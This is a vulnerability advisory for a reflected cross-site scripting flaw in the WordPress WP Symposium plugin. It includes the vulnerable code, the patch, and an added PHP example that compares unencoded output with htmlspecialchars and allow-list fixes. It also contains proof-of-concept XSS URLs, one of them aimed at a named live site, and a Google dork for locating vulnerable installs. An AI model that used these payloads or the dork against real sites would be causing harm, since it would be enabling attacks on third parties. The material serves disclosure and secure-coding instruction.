WordPress WP Symposium Plugin Cross Site Scripting

2015.09.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################
# Exploit Title : WordPress WP Symposium Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Google Dork: inurl:"/wp-content/plugins/wp-symposium/"
# Vendor Homepage : https://wordpress.org/plugins/wp-symposium/
# Date: 2015-09-02
# Tested On : Elementary Os - Firefox
# Software Link : https://downloads.wordpress.org/plugin/wp-symposium.15.8.1.zip
# Version : 15.8
######################
# Vulnerable Code:
# File: get_album_item.php - Line 5,12
5: $size = $_REQUEST['size'];
12: echo 'incorrect size: '.$size;
######################
# POC :
http://[URL]/[PATH]/wp-content/plugins/wp-symposium/get_album_item.php?size=<script>alert(/xss/)</script>
######################
# Live Target :
http://www.wpsyXmposium.com/wp-content/plugins/wp-symposium/get_album_item.php?size="><img src='x' onerror=alert(/xss/)>
######################
# Patch:
# File: get_album_item.php - Line 12
12: echo 'incorrect size: '.htmlspecialchars($size);
######################
# Discovered By : Ehsan Hosseini
######################
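The two lines quoted above are the whole bug: $_REQUEST['size'] (GET, POST or cookie) is concatenated into the response body with no encoding, and the suggested patch wraps it in htmlspecialchars(). The following is an added example, not code from the plugin or from the advisory author, that puts the vulnerable line next to a hardened version and runs both against the advisory's two payloads. The allow-list of size names is a placeholder assumption, not taken from WP Symposium.

```php
<?php
// Added example, not the plugin's own code. Reproduces the reflected-XSS
// pattern from get_album_item.php and shows two layers of fix.
// Assumptions: the handler only needs to report a bad "size"; the accepted
// size names below are hypothetical.

declare(strict_types=1);

// Vulnerable: attacker-controlled text is echoed straight into the HTML body.
function render_vulnerable(string $size): string
{
    return 'incorrect size: ' . $size;
}

// Vendor-style fix: HTML-encode before echoing. ENT_QUOTES also encodes the
// single quote (the default flags on PHP < 8.1 leave ' alone), and
// ENT_SUBSTITUTE returns U+FFFD for invalid UTF-8 instead of an empty
// string, which would otherwise silently drop the whole message.
function render_patched(string $size): string
{
    return 'incorrect size: '
        . htmlspecialchars($size, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Defence in depth: validate against a fixed list so untrusted text never
// reaches the output path at all. The list is a placeholder assumption.
function validate_size(string $size): ?string
{
    $allowed = ['thumb', 'medium', 'full']; // hypothetical size names
    return in_array($size, $allowed, true) ? $size : null;
}

// Constructed test inputs: the two payloads from the advisory PoC.
$payloads = [
    '<script>alert(/xss/)</script>',
    "\"><img src='x' onerror=alert(/xss/)>",
];

foreach ($payloads as $p) {
    echo "input:      ", $p, PHP_EOL;
    echo "vulnerable: ", render_vulnerable($p), PHP_EOL;
    echo "patched:    ", render_patched($p), PHP_EOL;
    echo "validated:  ", var_export(validate_size($p), true), PHP_EOL, PHP_EOL;
}
```

Run it with `php example.php`; the "patched" lines show `<`, `>`, `"` and `'` turned into entities, while "validated" is NULL for both payloads. The PoC requests get_album_item.php directly rather than through a WordPress route, so unless the script bootstraps WordPress itself, helpers such as esc_html() are not loaded and plain htmlspecialchars() is the correct tool. One more caveat when typing the parameter: $_REQUEST['size'] can arrive as an array (`size[]=x`), so cast or reject non-strings before passing it to either function.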


Copyright 2024, cxsecurity.com